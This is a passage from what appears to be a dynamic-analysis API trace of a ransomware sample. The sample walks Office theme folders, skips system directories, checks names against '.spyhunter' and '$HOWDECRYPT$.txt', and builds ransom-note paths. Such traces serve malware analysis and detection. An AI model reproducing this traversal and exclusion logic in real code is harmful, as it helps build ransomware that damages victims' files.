pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 81 [0090.386] StrStrIW (lpFirst="DEEPBLUE.INF", lpSrch=".spyhunter") returned 0x0 [0090.386] lstrcmpW (lpString1="DEEPBLUE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.386] lstrcmpW (lpString1="DEEPBLUE.INF", lpString2="_uninstalling_.png") returned 1 [0090.386] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 81 [0090.386] GetProcessHeap () returned 0x2c0000 [0090.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x345198 [0090.386] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1048) returned 0x3824f8 [0090.386] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.386] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.386] lstrlenW (lpString="Windows") returned 7 [0090.386] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.386] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.386] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.386] lstrlenW (lpString="System Volume Information") returned 25 [0090.386] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0090.386] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.386] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.386] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0090.387] GetProcessHeap () returned 0x2c0000 [0090.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x345288 [0090.387] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1050) returned 0x3824f8 [0090.387] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.387] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.387] lstrlenW (lpString="Windows") returned 7 [0090.387] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.387] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.387] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.387] lstrlenW (lpString="System Volume Information") returned 25 [0090.387] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0090.387] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.387] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.388] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.388] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0090.388] GetProcessHeap () returned 0x2c0000 [0090.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x345378 [0090.388] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1058) returned 0x3824f8 [0090.388] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.388] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.388] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\$HOWDECRYPT$.txt") returned 85 [0090.388] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\$HOWDECRYPT$.txt") returned 85 [0090.388] GetProcessHeap () returned 0x2c0000 [0090.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354af8 [0090.388] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1060) returned 0x3824f8 [0090.388] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.388] lstrcmpiW (lpString1="ECHO", lpString2="Windows") returned -1 [0090.388] lstrlenW (lpString="Windows") returned 7 [0090.388] lstrcmpiW (lpString1="ECHO", lpString2="$Recycle.bin") returned 1 [0090.388] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.388] lstrcmpiW (lpString1="ECHO", lpString2="System Volume Information") returned -1 [0090.388] lstrlenW (lpString="System Volume Information") returned 25 [0090.388] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned 64 [0090.388] lstrcmpW (lpString1="ECHO", lpString2=".") returned 1 [0090.388] lstrcmpW (lpString1="ECHO", lpString2="..") returned 1 [0090.389] GetProcessHeap () returned 0x2c0000 [0090.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.389] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*") returned 66 [0090.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.406] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.406] lstrlenW (lpString="Windows") returned 7 [0090.406] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.406] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.406] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.406] lstrlenW (lpString="System Volume Information") returned 25 [0090.406] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\.") returned 66 [0090.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.406] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.407] lstrlenW (lpString="Windows") returned 7 [0090.407] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.407] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.407] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.407] lstrlenW (lpString="System Volume Information") returned 25 [0090.407] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\..") returned 67 [0090.407] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.407] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.407] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.407] lstrcmpiW (lpString1="ECHO.ELM", lpString2="Windows") returned -1 [0090.407] lstrlenW (lpString="Windows") returned 7 [0090.407] lstrcmpiW (lpString1="ECHO.ELM", lpString2="$Recycle.bin") returned 1 [0090.407] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.407] lstrcmpiW (lpString1="ECHO.ELM", lpString2="System Volume Information") returned -1 [0090.407] lstrlenW (lpString="System Volume Information") returned 25 [0090.407] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 73 [0090.407] StrStrIW (lpFirst="ECHO.ELM", lpSrch=".spyhunter") returned 0x0 [0090.407] lstrcmpW (lpString1="ECHO.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.407] lstrcmpW (lpString1="ECHO.ELM", lpString2="_uninstalling_.png") returned 1 [0090.407] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 73 [0090.407] GetProcessHeap () returned 0x2c0000 [0090.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x386400 [0090.407] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1050) returned 0x3824f8 [0090.408] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.408] lstrcmpiW (lpString1="ECHO.INF", lpString2="Windows") returned -1 [0090.408] lstrlenW (lpString="Windows") returned 7 [0090.408] lstrcmpiW (lpString1="ECHO.INF", lpString2="$Recycle.bin") returned 1 [0090.408] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.408] lstrcmpiW (lpString1="ECHO.INF", lpString2="System Volume Information") returned -1 [0090.408] lstrlenW (lpString="System Volume Information") returned 25 [0090.408] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 73 [0090.408] StrStrIW (lpFirst="ECHO.INF", lpSrch=".spyhunter") returned 0x0 [0090.408] lstrcmpW (lpString1="ECHO.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.408] lstrcmpW (lpString1="ECHO.INF", lpString2="_uninstalling_.png") returned 1 [0090.408] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 73 [0090.408] GetProcessHeap () returned 0x2c0000 [0090.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x3857c0 [0090.408] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1058) returned 0x3824f8 [0090.408] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.408] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.408] lstrlenW (lpString="Windows") returned 7 [0090.408] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.408] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.408] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.408] lstrlenW (lpString="System Volume Information") returned 25 [0090.408] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 76 [0090.408] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.408] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.408] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.408] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 76 [0090.408] GetProcessHeap () returned 0x2c0000 [0090.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x375350 [0090.409] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1060) returned 0x3824f8 [0090.409] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.409] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.409] lstrlenW (lpString="Windows") returned 7 [0090.409] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.409] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.409] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.409] lstrlenW (lpString="System Volume Information") returned 25 [0090.409] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0090.409] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.409] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.409] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.409] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0090.409] GetProcessHeap () returned 0x2c0000 [0090.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374ec8 [0090.409] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1068) returned 0x3824f8 [0090.409] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.409] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.409] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\$HOWDECRYPT$.txt") returned 81 [0090.409] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\$HOWDECRYPT$.txt") returned 81 [0090.409] GetProcessHeap () returned 0x2c0000 [0090.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344bf8 [0090.410] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1070) returned 0x3824f8 [0090.410] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.417] lstrcmpiW (lpString1="ECLIPSE", lpString2="Windows") returned -1 [0090.417] lstrlenW (lpString="Windows") returned 7 [0090.417] lstrcmpiW (lpString1="ECLIPSE", lpString2="$Recycle.bin") returned 1 [0090.417] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.417] lstrcmpiW (lpString1="ECLIPSE", lpString2="System Volume Information") returned -1 [0090.417] lstrlenW (lpString="System Volume Information") returned 25 [0090.417] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned 67 [0090.417] lstrcmpW (lpString1="ECLIPSE", lpString2=".") returned 1 [0090.417] lstrcmpW (lpString1="ECLIPSE", lpString2="..") returned 1 [0090.417] GetProcessHeap () returned 0x2c0000 [0090.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.417] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*") returned 69 [0090.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.418] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.418] lstrlenW (lpString="Windows") returned 7 [0090.418] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.418] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.418] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.418] lstrlenW (lpString="System Volume Information") returned 25 [0090.418] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\.") returned 69 [0090.418] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.419] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.419] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.419] lstrlenW (lpString="Windows") returned 7 [0090.419] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.419] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.419] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.419] lstrlenW (lpString="System Volume Information") returned 25 [0090.419] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\..") returned 70 [0090.419] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.419] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.419] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.419] lstrcmpiW (lpString1="ECLIPSE.ELM", lpString2="Windows") returned -1 [0090.419] lstrlenW (lpString="Windows") returned 7 [0090.419] lstrcmpiW (lpString1="ECLIPSE.ELM", lpString2="$Recycle.bin") returned 1 [0090.419] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.419] lstrcmpiW (lpString1="ECLIPSE.ELM", lpString2="System Volume Information") returned -1 [0090.419] lstrlenW (lpString="System Volume Information") returned 25 [0090.419] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 79 [0090.419] StrStrIW (lpFirst="ECLIPSE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.419] lstrcmpW (lpString1="ECLIPSE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.419] lstrcmpW (lpString1="ECLIPSE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.419] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 79 [0090.419] GetProcessHeap () returned 0x2c0000 [0090.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3744d0 [0090.419] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1068) returned 0x3824f8 [0090.419] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.419] lstrcmpiW (lpString1="ECLIPSE.INF", lpString2="Windows") returned -1 [0090.420] lstrlenW (lpString="Windows") returned 7 [0090.420] lstrcmpiW (lpString1="ECLIPSE.INF", lpString2="$Recycle.bin") returned 1 [0090.420] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.420] lstrcmpiW (lpString1="ECLIPSE.INF", lpString2="System Volume Information") returned -1 [0090.420] lstrlenW (lpString="System Volume Information") returned 25 [0090.420] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 79 [0090.420] StrStrIW (lpFirst="ECLIPSE.INF", lpSrch=".spyhunter") returned 0x0 [0090.420] lstrcmpW (lpString1="ECLIPSE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.420] lstrcmpW (lpString1="ECLIPSE.INF", lpString2="_uninstalling_.png") returned 1 [0090.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 79 [0090.420] GetProcessHeap () returned 0x2c0000 [0090.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375438 [0090.420] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1070) returned 0x3824f8 [0090.420] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.420] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.420] lstrlenW (lpString="Windows") returned 7 [0090.420] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.420] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.420] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.420] lstrlenW (lpString="System Volume Information") returned 25 [0090.420] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 79 [0090.421] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.421] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.421] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 79 [0090.421] GetProcessHeap () returned 0x2c0000 [0090.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375520 [0090.421] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1078) returned 0x3824f8 [0090.421] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.421] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.421] lstrlenW (lpString="Windows") returned 7 [0090.421] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.421] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.421] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.421] lstrlenW (lpString="System Volume Information") returned 25 [0090.421] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 80 [0090.421] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.421] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.421] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 80 [0090.421] GetProcessHeap () returned 0x2c0000 [0090.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344bf8 [0090.421] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1080) returned 0x3824f8 [0090.421] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.421] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.422] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\$HOWDECRYPT$.txt") returned 84 [0090.422] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\$HOWDECRYPT$.txt") returned 84 [0090.422] GetProcessHeap () returned 0x2c0000 [0090.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354af8 [0090.422] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1088) returned 0x3824f8 [0090.422] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.422] lstrcmpiW (lpString1="EDGE", lpString2="Windows") returned -1 [0090.422] lstrlenW (lpString="Windows") returned 7 [0090.422] lstrcmpiW (lpString1="EDGE", lpString2="$Recycle.bin") returned 1 [0090.422] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.422] lstrcmpiW (lpString1="EDGE", lpString2="System Volume Information") returned -1 [0090.422] lstrlenW (lpString="System Volume Information") returned 25 [0090.422] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned 64 [0090.422] lstrcmpW (lpString1="EDGE", lpString2=".") returned 1 [0090.422] lstrcmpW (lpString1="EDGE", lpString2="..") returned 1 [0090.422] GetProcessHeap () returned 0x2c0000 [0090.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.422] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*") returned 66 [0090.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.431] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.431] lstrlenW (lpString="Windows") returned 7 [0090.431] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.431] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.431] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.431] lstrlenW (lpString="System Volume Information") returned 25 [0090.431] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\.") returned 66 [0090.431] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.431] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.431] lstrlenW (lpString="Windows") returned 7 [0090.431] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.431] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.431] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.431] lstrlenW (lpString="System Volume Information") returned 25 [0090.431] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\..") returned 67 [0090.431] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.431] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.431] lstrcmpiW (lpString1="EDGE.ELM", lpString2="Windows") returned -1 [0090.431] lstrlenW (lpString="Windows") returned 7 [0090.431] lstrcmpiW (lpString1="EDGE.ELM", lpString2="$Recycle.bin") returned 1 [0090.431] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.431] lstrcmpiW (lpString1="EDGE.ELM", lpString2="System Volume Information") returned -1 [0090.431] lstrlenW (lpString="System Volume Information") returned 25 [0090.431] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM") returned 73 [0090.431] StrStrIW (lpFirst="EDGE.ELM", 